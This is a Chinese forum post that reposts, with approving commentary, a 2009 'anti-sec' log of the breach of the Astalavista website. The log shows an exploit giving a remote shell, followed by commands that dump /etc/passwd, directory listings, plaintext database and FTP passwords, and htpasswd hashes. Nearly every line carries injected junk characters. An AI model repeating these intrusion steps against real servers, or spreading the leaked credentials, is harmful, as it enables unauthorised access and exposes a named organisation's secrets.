找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2437|回复: 0
打印 上一主题 下一主题

Astalavista被蹂躏过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:07:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。) j9 T2 d& M; K, ^

7 d" F1 e) v' z% [1 q4 B[root@front3 ~]# curl -I litespeedtech.com7 C+ j. |  e+ z& P7 t4 N
HTTP/1.1 200 OK- I( Z9 ^0 d( q9 f4 `+ z
Date: Fri, 05 Jun 2009 22:54:51 GMT5 o% i1 H# O" U9 L5 y) H% x1 L
Server: LiteSpeed$ q5 b! G. {- G/ ?' k$ x
3 {' T6 D7 S6 i2 i
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3  x64还有一个localroot 0day -_-
% i8 Z. H5 y# j: Y$ G% q% G' a7 X! b9 w. q
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。0 a0 h$ |! W5 _% h
5 o! q  t" I, P# _  [$ {$ {
+ G+ P6 x, E/ i- g/ p: q
/  _  \  /   _____/\__    ___/  _  \ |    |     /  _  \   \ /   /|   |/   _____/\__    ___/  _  \ & h3 w  |# b( I
/  /_\  \ \_____  \   |    | /  /_\  \|    |    /  /_\  \   Y   / |   |\_____  \   |    | /  /_\  \& y2 a: x0 s# p. c" n5 I: p
/    |    \/        \  |    |/    |    \    |___/    |    \     /  |   |/        \  |    |/    |    \
' W6 v4 d! N# y: U! a) Y, S; w& f\____|__  /_______  /  |____|\____|__  /_______ \____|__  /\___/   |___/_______  /  |____|\____|__  // F/ v7 C5 [2 o# n
        \/        \/                 \/        \/       \/                     \/                 \/; S; ?* G$ ~% m9 \9 v
                                  The Hacking & Security Community* a) p1 D& ]8 n+ x. X3 a# f, R0 r
[+] Founded in 1997 by a hacker computer enthusiast' t3 ^; m( X$ V, X. j
[-] Exposed in 2009 by anti-sec group
, A) F1 |3 k8 W' \# Y- f! `/ w8 t0 z- k4 I9 n9 A
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:3 `- f7 v  f9 ~8 X" W0 M' s4 r
>> 03. Who’s behind the site?
- z2 S; U# ~' F' L) A# X>>
' k" }9 M7 o( E9 f2 g; D# b>> A team of security and IT professionals, and a countless number of contributors from all over the world.4 o% \! Z8 B+ v3 @: ]' G% C% u

9 O+ A! f; {- G$ Y# E6 c/ u>> 05. Is it true that the site is visited by script-kiddies and warez fans only?3 E1 U7 q0 J* y) T) g+ ~9 g
>>8 {- p: a6 k3 z6 B
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
1 C3 |/ c) h' ^- _* Emilitary institutions.
" }6 D2 E4 T& _6 C8 i" D5 V>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
/ p5 d) I& o' b" n( i( t3 o4 o8 q
Why has Astalavista been targeted?* P8 y4 i, D5 }- P1 ?" O6 J: j

- G, C, J1 r, u9 N2 h* ~3 `Other than the fact that they are not doing any of this for the “community” but
; F  O: V$ t- t5 i' Jfor the money, they spread exploits for kids, claim to be a security community
4 U  c6 J0 z" s+ p; Z7 M) ~(with no real sense of security on their own servers), and they charge you $6.66
: q8 S  K: q1 {4 U8 Q3 f. Gper months to access a dead forum with a directory filled with public releases1 f, b# k& |% G! V9 B8 H
and outdated / broken services.& E! N& F# w3 H
$ ~/ u" O# z8 i* t
We wanted to see how good that “team of security and IT professionals” really is.4 ~( f/ B  g* L: a8 n2 G
% f) ^. M- P! Z, [) Y
Let’s begin.0 A$ Z+ S" W0 H4 O% a+ t$ S7 A
( b5 y" d9 |+ u0 U
anti-sec:~# ./g0tshell astalavista.com -p 80
! w# ?9 k" F! R5 t[+] Connecting to astalavista.com:801 z: w) d5 _  h
[+] Grabbing banner…. g7 m* V5 n/ n& Q; o8 y  |; E8 \  U
LiteSpeed, k6 _2 j$ r0 N; g5 r
[+] Injecting shellcode…
0 s  Q# j* O: S3 H) ^( U' t- l7 i# v1 [- e[-] Wait for it
, Q: C6 |) z5 u* K! {/ W* V' ~3 ^# H9 I3 v- L
[~] We g0tshell
) j( p8 x% l# H0 i7 i) funame -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
( C6 B8 @2 h/ h; CID: uid=100(apache) gid=500(apache) groups=500(apache)
0 ^9 m- L+ Z  n3 B% a1 }, F( m. u4 C' e: e
sh-3.2$ cat /etc/passwd! a8 B7 F8 f. P1 U/ [3 M- A
root:x:0:0:root:/root:/bin/bash, G5 {1 }& I) O
bin:x:1:1:bin:/bin:/sbin/nologin( Z/ P( ?, }7 U/ I1 n
daemon:x:2:2:daemon:/sbin:/sbin/nologin& j5 x. B& b1 \0 l) N7 Z
adm:x:3:4:adm:/var/adm:/sbin/nologin2 ?/ s1 x) c& A! u8 n+ m% ~
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin! L3 B# |2 B. i; \9 f
sync:x:5:0:sync:/sbin:/bin/sync
* q1 Z/ K: q. I) `0 F1 k; p" [. p  \shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
( z4 b! R  P) x) Uhalt:x:7:0:halt:/sbin:/sbin/halt1 X8 M* m0 [' [( J7 v& {: s5 N
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin# l5 I  O  b: ?. Y) G5 [- s
news:x:9:13:news:/etc/news:
! L) d; M) G' Luucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin$ T, S- a8 @0 E, b) S
operator:x:11:0perator:/root:/sbin/nologin. J+ D2 P. k' K1 ~
games:x:12:100:games:/usr/games:/sbin/nologin
8 e" W, Z, }$ Z7 y+ T. tgopher:x:13:30:gopher:/var/gopher:/sbin/nologin' Y8 V  v2 v3 o3 x# L5 S! F
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin/ D) p9 l7 L6 r2 p
nobody:x:99:99:Nobody:/:/sbin/nologin  o1 Y- }  ^* W! c* j/ c
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
+ l3 U) s1 r% S1 u' k! ^0 a' adbus:x:81:81:System message bus:/:/sbin/nologin
, i+ p% T0 |/ {0 ?3 C( z+ o$ u) mnscd:x:28:28:NSCD Daemon:/:/sbin/nologin1 R: a; a" z% Z( T4 r
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
) g" o# B3 U0 }" Nsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
2 N1 h2 I! k0 d4 J8 T5 wvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
3 d: n% x9 C3 w: Ahaldaemon:x:68:68:HAL daemon:/:/sbin/nologin
: [8 |# o+ E( hrpc:x:32:32ortmapper RPC user:/:/sbin/nologin" ^/ g( c( d; K  s4 j
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
4 P! |. M6 p9 Mnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin: e6 f! q) N% T7 k
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin+ m9 ^5 ]5 ?4 @" G. m  b
pcap:x:77:77::/var/arpwatch:/sbin/nologin
7 ]* k6 p# y: Hnamed:x:25:25:Named:/var/named:/sbin/nologin/ S9 {# O7 V8 T' }5 f
apache:x:100:500::/var/www:/bin/false
& |, w/ M! t7 A5 J$ sdiradmin:x:101:101::/usr/local/directadmin:/bin/bash4 i6 q; e# k( e  i4 i# @
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
+ j' \  e$ ~9 I' fwebapps:x:500:501::/var/www/html:/bin/bash
1 X$ i# e! Y1 l1 dmajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
' v- a8 a, J1 [; P- F5 Aadmin:x:501:502::/home/admin:/bin/bash; M* K& A8 O$ q/ b/ Z2 d
jon:x:502:503::/home/jon:/bin/bash
9 k* J$ F. q7 a+ Ycom:x:503:504::/home/com:/bin/bash# n7 }7 j! B! ]5 f% g" h/ K' x
ntp:x:38:38::/etc/ntp:/sbin/nologin! [8 a, a( j* G( L9 ?, P
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
) M1 E) U# @1 X1 U+ Zastanet:x:504:505::/home/astanet:/bin/bash
# ~! D) [* V6 U! n5 f1 _8 iavahi:x:70:70:Avahi daemon:/:/sbin/nologin8 Z" v+ \" }+ j7 D$ b& A6 ^7 O8 T
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
/ d# C# [. i3 Q8 n7 c" H% I
/ j- Z! J6 c3 H' P  e$ n% ~sh-3.2$ cat /etc/hosts
) l$ T$ E) d. O7 }, q! ^' C# Do not remove the following line, or various programs7 t: x0 R6 T+ r
# that require network functionality will fail.. O0 o; |/ ]0 l
127.0.0.1       localhost.localdomain   localhost: D0 t, G% m, L" q) [
::1     localhost6.localdomain6 localhost6
. H3 d% D4 m8 N9 i" k1 I80.74.154.172           asta1.astalavistaserver.com
2 M2 k7 \( L6 v" g1 M* x- p- r, z& M- F" q4 n3 b
sh-3.2$ pwd
3 q' a$ m6 D/ k! k% F3 M/home/com/public_html5 }: h$ j7 f8 |+ C* H
; J1 T  }# C* c
sh-3.2$ ls -la
, ^0 u5 Z& f( R" b2 V' l# \( Ototal 184602 ^# G0 }1 h" m; _6 K
drwxr-xr-x 30 com apache     4096 May 28 17:06 .
1 ^3 R+ N8 J. m- jdrwx–x–x 11 com com        4096 Jun 25  2008 ..
) K8 ]1 g1 F; C5 B8 \# _6 ddrwxr-xr-x  2 com com        4096 Feb  2 19:29 admin$ T! j6 Q. _$ C& J. V+ y
drwxrwxrwx  2 com com    18591744 Jun  4 08:04 cache. z0 o: r9 R; g8 W; K( W9 c1 P
drwxr-xr-x  6 com com        4096 Mar 28 21:17 cadmin
* a" `1 ]1 l6 J) d  |6 \) Ddrwxrwxrwx  2 com com        4096 May 19 00:50 config
7 V5 }, a9 z, ~  K  I5 e% ~drwxr-xr-x  2 com com        4096 Mar 20 11:05 core0 d9 @' S( G! {5 a* l$ c
drwxr-xr-x 18 com com        4096 Feb  2 19:29 core_modules! l) u$ o+ k( k6 {0 w/ ]
drwxr-xr-x  4 com com        4096 Feb  2 19:29 customizing
7 Y$ z5 N, B/ d& fdrwxr-xr-x  2 com com        4096 May 11 13:24 customizing_paulo
1 Q5 u, m/ ~- l& B  D+ U8 jdrwxr-xr-x  6 com com        4096 Mar 30 12:28 __DELETE__0 V& m  |9 e" g& G3 P
-rw-r–r–  1 com com        8035 May 19 14:26 directory_to_mediadir.php
7 }% P$ F% M- Y) e" _drwxr-xr-x  2 com com        4096 Sep  9  2008 dvd3 S* `8 I7 {9 r$ V
drwxr-xr-x  3 com com        4096 Feb  2 19:29 editor6 P  V' h! X( R, Q6 o
-rw-r–r–  1 com com        3750 Feb 27 16:12 favicon.ico
* R) D, k  K" C2 ldrwxrwxrwx  2 com com        4096 Jun  4 08:00 feed
2 s, u6 F# P7 c5 |-rwxrwxrwx  1 com com       10736 May 29 12:44 .htaccess( ~% [% H: i5 d- ^  p6 l. u! D6 ^% g; b
-rw-r–r–  1 com com        7638 Apr 21 08:45 .htaccess.2009-04-21.bak
( C. W+ S5 x1 w3 k-rw-r–r–  1 com com       10768 May 11 11:53 .htaccess.2009-05-11.bak
7 a1 L. Y1 r& ydrwxr-xr-x 18 com com        4096 Apr  9  2008 ideapool+ f1 ~; Y9 @7 y! ~, g
drwxrwxrwx 14 com com        4096 Feb  2 19:29 images
9 d* ~' a' M" r8 R$ C/ P: G-rw-r–r–  1 com com       97496 Jun  2 13:01 index.php
9 m& L  k" u2 G. p& hdrwxr-xr-x  6 com com        4096 Feb  2 19:29 installer
3 q. J+ K+ N* z  S0 cdrwxr-xr-x  8 com com        4096 Feb  2 19:29 lang
2 h+ n) c3 x& f$ w3 ~( V, y6 a# Pdrwxr-xr-x 22 com com        4096 Feb  2 19:29 lib
8 |% O, ^7 K0 _. Hdrwxrwxrwx 12 com com        4096 Jun  2 07:47 media% @5 f  b8 R5 ^6 ~
drwxr-xr-x  8 com com        4096 May 11 12:48 modifications4 s- ^8 f/ p" f( t/ [8 ~( H& C
drwxr-xr-x 34 com com        4096 May 28 16:30 modules) {" P. M4 L) b& _* {
drwxr-xr-x 11 com com        4096 Jan 30 15:00 _myAdmin
' w0 k0 x* N, L5 m$ E! gdrwxrwxr-x 22 com com        4096 May 28 17:06 _new
; i' z/ F  q8 fdrwxr-xr-x 26 com com        4096 Feb  2 19:27 _old
5 X: }" p" T( u  a0 V* A9 K4 Gdrwxr-xr-x  2 com com        4096 Mar 30 12:29 phproxy
/ |/ l; X  t8 d( @/ P5 xdrwxr-xr-x  2 com com        4096 Mar 30 12:30 proxy
; Q# y0 A* G* ^, l$ o$ H-rw-r–r–  1 com com          26 Feb  2 19:33 robots.txt. q% K3 t3 T& ~/ j/ a
-rwxrwxrwx  1 com com       10844 Jun  2 09:50 sitemap.xml5 J  U) T  z) j0 h# N0 t
-rw-r–r–  1 com com         223 Mar 30 15:32 test.php1 ^( b( @. v  r7 Z
drwxrwxrwx  8 com com        4096 Mar  6 13:15 themes
' J1 N! N; Q: L, Y9 X/ N" i+ Ndrwxrwxrwx  3 com com        4096 Jun  4 08:00 tmp3 N/ {# [+ M6 y2 I, F' q& J1 a
drwxr-xr-x  3 com com        4096 Feb  2 19:33 webcam$ e! X/ w. W1 X

, c0 `& A9 j7 r( H3 msh-3.2$ head -20 index.php
3 ~+ m: b" \1 H( j. Y1 g% Y<?php; ]( S3 _! b; W8 g) N, w

4 [" X: l) I7 V0 v2 b2 ?' P6 ?1 }/**' p6 ~0 D6 M9 Y! [5 _3 h
* The main page for the CMS6 N# r# E) }" R. _7 X( @& D8 f
* @copyright   CONTREXX CMS - COMVATION AG" r$ }+ b/ ]1 {# j( B$ k
* @author      Comvation Development Team. c; s1 T% Y$ Y" j3 t
* @version     v1.0.9.10.1 stable
$ r2 |6 t+ ^% f: {8 a; |' N3 a6 ~5 y* @package        contrexx: O, j9 e: @6 B: I3 T
* @subpackage    core/ o4 t0 m# m; a( B) G
* @link        链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
. q6 |0 V8 r! j4 K( Y) |* @since       v0.0.0.0
- O( p' |+ J1 S! j* @todo        Capitalize all class names in project& R7 b8 x) j$ w3 E4 h) p7 z
* @uses        /config/configuration.php
# L" B5 P$ a- g! Y( _8 H* @uses        /config/settings.php
6 f7 O/ H/ o) \3 N6 x* @uses        /config/version.php
* e+ s+ W! s: U1 D! \* @uses        /core/API.php
# S# ?# b/ |" D% u- n  l3 _3 w* @uses        /core_modules/cache/index.class.php! d  f% O9 w: p3 v" _3 e' s& N( n, A3 [
* @uses        /core/error.class.php
  X! u% Z) O+ ~0 g$ ?* @uses        /core_modules/banner/index.class.php
' F" @, ?" U: @0 }1 p* @uses        /core_modules/contact/index.class.php3 S* a, s! J- D) g, l
/ J2 A5 A! b6 v
sh-3.2$ cd config/
- i, R* }9 V  qsh-3.2$ ls -la# O: w" }: G3 `
total 32) |8 h: u% R5 L7 ]3 u4 k  ]
drwxrwxrwx  2 com com    4096 May 19 00:50 .& R( Y4 y3 S1 J5 }
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..% x. L' ~- j- b4 n6 S
-rwxrwxrwx  1 com com    2998 May 11 12:29 configuration.php5 L$ Z# C  \/ x- S  F" F2 W
-rwxrwxrwx  1 com com    7610 May 28 17:27 set_constants.php- X$ C' ~# i9 u8 @
-rwxrwxrwx  1 com com    4186 May 25 12:54 settings.php
9 m+ A; T( [" g# E( o) t2 G/ `" u-rwxrwxrwx  1 com com     672 Feb  2 19:29 version.php
; M& z# b; E9 G2 Q" X
$ ]+ k  G4 i1 N, i  Y" j8 ish-3.2$ cat configuration.php
) T5 f+ _% @4 M" J[snip]
) x( C( v6 f0 D& S8 V$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
) L7 ]5 G) K$ {5 Z6 t7 R$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
! y# h) N0 y1 a* t$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix9 `1 t5 O) o: c3 N( q6 W6 D5 X
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username( g% V1 L9 I! A5 V  }" @0 n( U6 h
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password" N' h7 @1 K% G& }5 |
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)! |+ c. o$ }. ?6 w* f. k2 |
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)' U: ]0 x2 \6 u, q2 u# s, m
[snip]
1 s) h( ?. W9 u5 e* M# b: T2 n* v$_FTPCONFIG['is_activated'] = true; // Ftp support true or false+ T3 G1 P0 l. J- n7 O! p. m( B7 I
$_FTPCONFIG['use_passive'] = true;      // Use passive ftp mode
. A, J* _$ N7 Y7 K) i$_FTPCONFIG['host']     = ‘localhost’;// This is normally set to localhost
% T* E$ \8 E, t7 ]5 L8 }3 f4 n9 G; T$_FTPCONFIG['port'] = 21; // Ftp remote port
" ^- o- m# C2 o$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username4 z. q) {' ]) s6 Y
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password1 P5 b$ U% r  `
$_FTPCONFIG['path']     = ‘/’; // Ftp path to cms& G( q) X6 ~* @1 I9 @

  t, o8 R: S+ K5 ?) V2 L  x4 U$ Esh-3.2$ cd ..3 u+ i- h4 a9 j3 R3 ~+ h
sh-3.2$ cd dvd/
3 s% g! q8 M4 R! N, }sh-3.2$ ls -la/ C' c( n" \) q% f
total 29137807 i8 U8 ?! C# N" S  S( g; l# B
drwxr-xr-x  2 com com          4096 Sep  9  2008 .
8 z$ l1 ]$ Q/ a( |2 Y2 _& }# tdrwxr-xr-x 30 com apache       4096 May 28 17:06 ..8 \' @# e  R4 {$ U- D
-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part1.rar
( J  ^* ~2 {9 u% n" G-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part2.rar, p' k3 V9 J# _4 y$ Q5 c
-rw-r–r–  1 com com     880644069 May 16  2008 astalavista_security_toolbox_dvd_2008.part3.rar
2 Z& g( K6 z  Y3 A5 @: Y. l-rw-r–r–  1 com com           115 Jan 29  2008 .htaccess
7 K6 L% X% P+ G. G+ g5 T/ g; V& A* P# R7 j1 }' ^1 ]) Z( O& x  N$ m
sh-3.2$ cat .htaccess
5 ^* W$ h" b0 C. R; T& R  H2 AauthType Basic# p" w, R" N+ X8 P/ v
authName DVD! d1 P& f- }1 {- x
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
" _4 j2 L2 m5 p, Xrequire valid-user6 W2 \/ O/ D/ f& v, R8 [3 |
& P: k2 k, c3 p: m  A: ~0 d5 \3 Y
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd  X8 o7 v; M# W" Y9 E8 A' e
DVDdownload:CRD8cuY6.MPT6, ]$ g! T# o# Y
DVDdownload2:CR8a36.wluFMg9 e! q6 s8 e/ q, q7 K" a2 S

5 B- N3 [$ w1 L* T4 Csh-3.2$ cat test.php
+ y/ \8 g8 ~" x! Y  ?<?php
# B' l) ^6 W$ Z+ a4 R$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
& M1 q; Q. d' f$ p# F& H% B$url = str_replace(array(’&amp;’, ‘&#38;’), ‘&’, base64_decode(rawurldecode($url)));
/ P* @+ C2 @9 K5 U: Aecho $url;
0 K& F5 k8 u. u?>+ S/ m1 y" A7 ]. d
7 E% ^7 e0 m6 L6 j: k4 |- [
sh-3.2$ cd modifications/* s" q/ F3 C5 V
sh-3.2$ ls -la2 O+ ~* |+ W- p/ I
total 32
0 C! M1 c, B1 K: i) G/ [, Adrwxr-xr-x  8 com com    4096 May 11 12:48 .
, Z2 A; M( P5 h0 W6 edrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
6 n# ?2 Y; h4 l! G! B! d5 A5 Udrwxr-xr-x  3 com com    4096 Feb  2 19:33 com_avtng
$ ]0 P' o, [% W  H( ?3 a2 _. U3 A" N9 Idrwxr-xr-x  3 com com    4096 May 12 09:26 cronjobs
' l6 M/ ~+ c9 N: ^* q& vdrwxr-xr-x  2 com com    4096 Mar  2 10:35 onlinetools
1 P  P% X! n" c$ Udrwxr-xr-x  4 com com    4096 Feb  2 19:33 pjirc
1 A. {  _3 ]; q2 N* n9 O' \: idrwxr-xr-x  2 com com    4096 Feb  2 19:33 search
4 n. Z+ d7 B" j' c: Fdrwxr-xr-x  2 com com    4096 Mar 25 08:56 _tmp
- B. w/ ~& w2 I1 p6 Z6 e: K
$ `. [$ s+ T% G: r' y% Tsh-3.2$ ls -R0 O. F. O7 _/ \3 N% ?4 h$ y
.:
9 P3 l: b7 P" t) L+ C0 X7 |com_avtng  cronjobs  onlinetools  pjirc  search  _tmp
0 e- y/ |: f7 O# Q, p, |% f( M1 z1 ^8 O# {2 _
./com_avtng:
$ b, e/ A% G& e& Gavtng.php  banner_bottom.inc.php  banner_button.inc.php  banner_content.inc.php  banner_popunder.inc.php  banner_right.inc.php  banner_top.inc.php  iframe.php  scripts& b( @# x) Q6 H4 S6 y
* I( y# h' ?, W7 C. `& K4 x3 F
./com_avtng/scripts:
/ ]3 U; Q: g7 q6 E- g8 Kpopunder.js
9 T0 u; ~  @; b7 Z/ J: Y% G  S, H5 v& r% ~2 ?
./cronjobs:' R& F+ P& w, V3 ]' o8 J: r9 @
exploits.php  exploits.sh  google_blogindexing.php  ip2country.sh  proxydb2.php  proxydb.php  securitynews.php  tmp% t" @, x: h6 U( |4 q( {

; c0 }$ C, R/ B5 [8 ]./cronjobs/tmp:. R) [; X, @; a( _* }; y
contrexx_module_onlinetools_defaultports.csv  contrexx_module_onlinetools_geolitecity_country.csv
8 G" p  u8 O  y% W* G( W0 H! j/ [
; l. `1 u+ X; E& p./onlinetools:
* E1 d+ q. t4 L4 D6 Gindex.php8 I5 ~+ C; ~* l! w: H7 }

9 Q, ?/ Y4 g$ u9 b8 b( y./pjirc:& V# @. S& }/ _: L6 a1 Q- I
a_big.jpg          english.lng       img              irc.jar           NormalApplet.html  pixx-french.lng  pjirc.cfg       securedirc-unsigned.cab  thanks.txt. g+ a" k& h+ z0 ~1 ]. E% G
AppletWithJS.html  french.lng        IRCApplet.class  irc-unsigned.jar  pixx.cab           pixx.jar         readme.txt      SimpleApplet.html        versions.txt
; I1 E" X& v7 @) |; N* |3 nbackground.gif     HeavyApplet.html  irc.cab          license.txt       pixx-english.lng   pixx-readme.txt  securedirc.cab  snd- ^6 h& O2 H1 J

3 G4 U7 J) Y9 k8 L./pjirc/img:
( F; I- E: I/ T- ?0 Aange.gif    bombe.gif   clin-oeuil.gif         content.gif  enerve2.gif  garcon.gif     langue.gif  mecontent.gif  ordi.gif       portable.gif   sapin.gif    triste.gif' V( q9 x$ X  I6 U# J8 E
arbre.gif   bouche.gif  clin-oeuil-langue.gif  cool.gif     femme.gif    grognon.gif    lettre.gif  newbie.gif     pere-noel.gif  pouce-non.gif  sleep.gif   
" x2 e/ v. B9 R+ Rverre-eau.gif- x7 O! v4 G1 x
argh.gif    bouqin.gif  coeur-brise.gif        diable.gif   fille.gif    halloween.gif  lit.gif     OH-1.gif       pleure.gif     pouce-oui.gif  soleil.gif  
% [# i, R6 F1 i6 s) F( v  [verre-vin.gif
" i5 B. y4 `: z$ C% B' x4 Bballon.gif  cadeau.gif  coeur.gif              dwchat.gif   fleur.gif    hamburger.gif  love.gif    OH-2.gif       poisson.gif    roll-eyes.gif  sourire.gif  yinyang.gif. S5 N9 h  b! p0 X0 _3 S/ p: y
biere.gif   chien.gif   comprends-pas.gif      enerve1.gif  fume.gif     homme.gif      lune.gif    OH-3.gif       pomme.gif      rouge.gif      terre.gif- z& C' s. \" ^& d6 R5 `) E/ q8 r: j0 T
" u, `2 A5 Y3 Z" N) L) i( i! V/ @
./pjirc/snd:- G4 r0 _/ N' }6 r4 k
bell2.au  ding.au
3 Y* L8 K% z. z8 y9 W; O0 q- F, j; C, f7 w2 Z3 Y" }6 Q% k
./search:# n  p& `2 n* U) e6 R8 N/ e6 [
searchEngines.php  search.php
& Z4 U3 |1 B+ ?4 t' N$ u
: V0 x+ r$ y( D: ~7 w. [( b./_tmp:; r2 v4 o9 F$ f; z: o
defaultPorts.php  defaultPorts.txt8 j  m; ~0 ?9 T; A
8 S- s) T! U) \! N8 e& U% ^
sh-3.2$ cd cronjobs/# U; B* L- A4 j! s1 p
sh-3.2$ cat exploits.php
( D1 y" j, y: h3 G0 _[snip]$ J' P" n* J( K& x5 X, o: W; d
$categories   = array();' m6 o& D. w. M# J
$milw0rmFile  = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;% ^8 |3 F4 H6 C$ H# x
$expolits     = file($milw0rmFile);. b, f6 S4 [2 Z5 U) S6 A/ E7 e
$comExploits  = array();0 v; G5 @3 I' i- @' `- C
[snip]
& J  z" I! g# E, N// manage data
& }/ d$ m- N  _* i& d& gfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
# K! [2 H) |' s$ B
" B& i$ I, Z! N) i" ?: p# h    // get path and title# y$ C+ t- l" F/ t! U% |
    $expolits[$x] = trim($expolits[$x]);* p" j; F" r1 k6 E/ J3 M
    $path         = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
) C0 d: w; m* Q; I4 S. c    $title        = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);( ^, F3 `% a; \! k
* u) T( J9 m  y5 \  O( B( }
    // check if file exists
8 X0 K! B4 U" L& [% p! x1 y    if (file_exists($path)) {
+ W; I0 P' t: e: o5 o# [7 y6 B- z) z" V3 ^! L7 @; i* J; z
        $text = file_get_contents($path);
: l& B7 f6 D* k" O, {, B$ W
  h9 f, f0 g6 L" c1 c        // get content and date1 T$ V* D% D6 U8 [. t( g: I, ~
        //$text = htmlspecialchars($text, ENT_QUOTES);+ M; d' f5 w  t
        $tmptext = addslashes(htmlentities($text,  ENT_QUOTES, “UTF-8″));1 B" q2 R0 [( e8 K, M9 R
        if ($tmptext != ”) {
5 F3 [% A$ D- Y" v% I8 Q            $text = $tmptext;
/ x+ a! b2 ?3 g: ^        } else {' J' A' G) P9 X% u' `  ~
            $text = addslashes(htmlentities($text,  ENT_QUOTES));
6 T+ H6 z/ w8 h9 u9 Q3 [" f        }0 w# A$ o3 z0 z# I3 H9 r
        $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
: u3 o) ]8 {" X/ D* [        $tmp  = explode('-', $date);
& M1 M* o' M) E- A1 f6 i        $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));9 M: L7 c6 y6 ^" j" _! X5 ]; g1 K; X
        $cat  = getCategory ($path);
! [$ x# n/ P: G8 _        $ext  = pathinfo(basename($path));
7 {! g( {4 y6 z; ^3 ^        $ext  = $ext['extension'];8 f7 h0 U1 k% s) J
        $qStr = ”
- Z$ t- a7 u8 I$ y. q            SELECT  `id`
) V5 H& I1 Z' w4 _% t5 U9 S            FROM    `contrexx_module_exploits`: @' W, t* |" j5 a/ o- R$ ]0 Q+ i
            WHERE   `title`  =  ‘” . $title . “‘! J% a) X5 R8 f' Y9 b" y/ G
            AND     `date`   =  ‘” . $date . “‘3 A! v& H- W/ S: F, A/ p- p0 F- Z0 r2 f
        “;
; d$ d4 u/ V9 S5 O' M$ E! w        echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
, o' G0 L. Y3 X9 u: C8 S7 k& ^* f% i        $q = $_objDB->query($qStr);4 n4 o/ R0 T" B1 N
+ ?' q* q$ _( Y% g$ k8 v# \9 v9 i
        if ($q->numRows() == 0) {4 {4 n0 w( Z# r3 \, d7 y/ |: @
% m: M" V- d' q" t# f
            // prepare array
& s6 j! o- N) Y- A5 Q4 d            $comExploits[$x]['date']      = $date;
' Q9 ?2 `8 h! s+ w0 ^% h/ b) Z3 x            $comExploits[$x]['title']     = $title;
7 t+ F  S# Z' n8 f$ v            $comExploits[$x]['author']    = ‘milw0rm’;
0 ^5 t$ j' l  M0 o            $comExploits[$x]['text']      = $text;
4 @- G$ I% k/ n: F            $comExploits[$x]['source']    = $ext;
  s3 a5 b1 Y5 P6 n3 q3 b  v: O$ T            $comExploits[$x]['url1']      = ”;- A8 c- o4 F0 I
            $comExploits[$x]['url2']      = ”;* e3 C, L, V6 h/ |
            $comExploits[$x]['catid']     = $cat;5 ?9 B+ O4 w- r  r& F. p6 M
